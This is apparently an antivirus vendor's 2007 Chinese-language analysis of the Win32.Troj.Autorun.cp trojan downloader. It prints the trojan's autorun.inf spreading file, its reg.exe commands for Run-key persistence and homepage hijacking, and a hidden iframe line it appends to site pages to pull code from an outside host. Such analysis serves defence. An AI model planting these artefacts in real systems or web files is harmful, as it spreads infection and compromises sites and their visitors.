Win32.Troj.Autorun.cp
病毒别名: 处理时间:2007-06-22 威胁级别:★
中文名称:疾行者 病毒类型:木马 影响系统:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
病毒行为:
这是一个木马下载病毒,该病毒会删除被感染机器上的ghost备份文件,并且尝试感染脚本文件,尝试通过U盘传播把病毒本身传播出去。链接指定网址,下载其他木马程序。
1.%system%SVSH0ST.EXE
%system%Autorun.inf
2.病毒把本身拷贝到每个盘符下面并且命名为来lcg.exe,并且创建autorun.inf文件,内容如下:
[AutoRun]
open=lcg.exe
shellopen=打开(&O)
shellopenCommand=lcg.exe
shellopenDefault=1
shellexplore=资源管理器(&X)
shellexploreCommand=lcg.EXE
3.创建互斥量"niux"
3.运行创建进程运行下面的命令:
reg.exe
"ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D "
"ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\WINNT\System32\SVSH0ST.EXE /F"
"add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f"
"add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f"
4.枚举所有当前窗口,如果发现窗口信息中含有以下字符,就关闭该窗口:
"病毒"
5.遍历所有的盘符,如果文件后缀名为.GHO文件(ghost备份文件),则删除该文件,如果文件名中含有以下的
INDEX.ASP
.HTM
INDEX.PHP
DEFAULT.ASP
DEFAULT.PHP
CONN.ASP
之一的责尝试在文件末尾插入代码:
<iframe src=http://*/test.htm width=0 height=0></iframe>